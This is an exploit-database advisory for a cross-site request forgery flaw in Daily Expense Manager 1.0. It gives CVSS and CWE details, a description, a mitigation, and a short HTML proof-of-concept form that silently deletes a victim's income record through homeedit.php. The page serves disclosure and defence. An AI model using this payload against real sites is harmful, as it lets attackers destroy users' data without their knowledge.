header-logo
Suggest Exploit
vendor:
Daily Expense Manager
by:
Mr Winst0n
8.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Daily Expense Manager
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:daily_expense_manager:daily_expense_manager
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Parrot OS
2019

Daily Expense Manager – CSRF (Delete Income)

This exploit allows an attacker to delete an income record from the Daily Expense Manager application. The attacker can craft a malicious HTML page with a form that submits a POST request to the homeedit.php page with the delincome parameter set to the ID of the income record they wish to delete. When a user visits the malicious page, the POST request will be sent and the income record will be deleted.

Mitigation:

The application should implement a CSRF token system to prevent unauthorized requests from being accepted.
Source

Exploit-DB raw data:

# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 8, 2019
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS


# PoC:

<html>
<body>
	<form action="http://server/homeedit.php?delincome=778" method="post">
		<input type="submit" value="Click!" />
	</form>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR